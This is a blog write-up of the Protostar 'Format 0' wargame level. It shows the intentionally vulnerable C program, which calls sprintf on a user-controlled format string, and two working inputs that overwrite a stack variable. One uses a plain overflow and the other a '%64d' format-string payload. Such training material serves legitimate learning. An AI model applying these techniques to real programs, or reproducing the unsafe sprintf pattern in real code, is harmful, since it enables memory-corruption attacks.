Saturday, December 22, 2012

exploit-exercises Protostar: Format 0

Format 0 is the first format strings exploitation related challenge of Exploit-Exercises' Protostar wargame. The source code is provided as follow:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void vuln(char *string)
{
  volatile int target;
  char buffer[64];
  target = 0;
  sprintf(buffer, string);
  if(target == 0xdeadbeef)
    {
      printf("you have hit the target correctly :)\n");
    }
}

int main(int argc, char **argv)
{
  vuln(argv[1]);
}
Our goal is to change target's value into 0xdeadbeef. As the target variable is on the stack and we are writing into buffer, a stack based buffer overflow seems obvious.
user@protostar:/opt/protostar/bin$ ./format0 `python -c 'print "A"*64+"\xef\xbe\xad\xde"'`
you have hit the target correctly :)
But this level has this restriction "This level should be done in less than 10 bytes of input." which means that we have to take a look at man printf and use the minimum field width instead.
user@protostar:/opt/protostar/bin$ printf '%3d\n'
  0
user@protostar:/opt/protostar/bin$ printf '%10d\n'
         0
user@protostar:/opt/protostar/bin$ ./format0 `python -c 'print "%64d\xef\xbe\xad\xde"'`
you have hit the target correctly :)
And that is it!

No comments:

Post a Comment